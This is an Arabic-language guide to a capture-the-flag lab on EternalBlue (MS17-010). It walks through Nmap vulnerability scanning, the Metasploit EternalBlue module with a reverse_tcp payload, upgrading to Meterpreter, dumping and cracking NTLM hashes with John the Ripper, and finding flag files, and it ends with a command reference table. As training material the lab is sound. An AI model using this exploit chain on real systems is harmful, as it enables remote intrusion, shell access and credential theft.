عن اللاب
اللاب ده بيعلمك استغلال EternalBlue خطوة بخطوة: من فحص Nmap لاكتشاف إن الجهاز عرضة للثغرة، لـ Metasploit للحصول على Meterpreter shell كصلاحية SYSTEM مباشرة، ثم كسر hash كلمة المرور بـ John the Ripper وإيجاد الـ flags في نظام الملفات.
CVE-2017-0144 — EternalBlue (MS17-010)
ثغرة في بروتوكول
SMBv1 سرّبتها مجموعة Shadow Brokers من NSA سنة 2017. استُخدمت في WannaCry ransomware اللي أصابت أكتر من 200,000 جهاز في 150 دولة. بتسمح بتنفيذ كود عن بُعد (RCE) من غير الحاجة لأي بيانات دخول، على Windows 7 وServer 2008.
اللاب بيديك SYSTEM مباشرة بدون الحاجة لـ Privilege Escalation منفصلة — EternalBlue بيدّي أعلى صلاحية من اللحظة الأولى.
مسار الحل
1
Recon — Nmap Vuln Scan
فحص البورتات + اكتشاف الثغرات تلقائياً بسكريبتات Nmap
nmap -A -T4–script=smb-vuln-ms17-010
2
Gain Access — EternalBlue في Metasploit
البحث عن الـ module وتشغيله بـ payload مخصص لـ Windows 7 x64
ms17_010_eternalbluewindows/x64/shell/reverse_tcp
3
Escalate — Shell to Meterpreter
تحويل الـ shell العادية لـ Meterpreter بـ post module عشان تستخدم كل المميزات
shell_to_meterpreter
4
Hash Dumping + Cracking
استخراج password hashes بـ hashdump، ثم كسرها بـ John the Ripper
hashdumpjohn –format=nt
5
Find Flags — 3 Flags
البحث عن الـ flags في مواقع مختلفة على نظام ملفات Windows
C:\flag1.txtSystem32\configUsers\Jon\Documents
مرجع الأوامر
| الأمر | الوصف |
|---|---|
| nmap -p- -A -T4 <IP> | فحص كل البورتات والخدمات |
| nmap -p 445 –script=smb-vuln-ms17-010 <IP> | تأكيد إن الجهاز عرضة لـ EternalBlue |
| use exploit/windows/smb/ms17_010_eternalblue | اختيار الـ EternalBlue module |
| set payload windows/x64/shell/reverse_tcp | الـ payload المناسب لـ Windows 7 x64 |
| use post/multi/manage/shell_to_meterpreter | تحويل Shell لـ Meterpreter |
| hashdump | استخراج كلمات المرور كـ hashes |
| john hash.txt –format=nt –wordlist=rockyou.txt | كسر الـ NTLM hash |
| search -f flag*.txt | البحث عن الـ flags في نظام الملفات |
المهارات اللي هتكتسبها
SMB Exploitation
Nmap Vuln Scripts
Metasploit Framework
Meterpreter Shell
NTLM Hash Dumping
Password Hash Cracking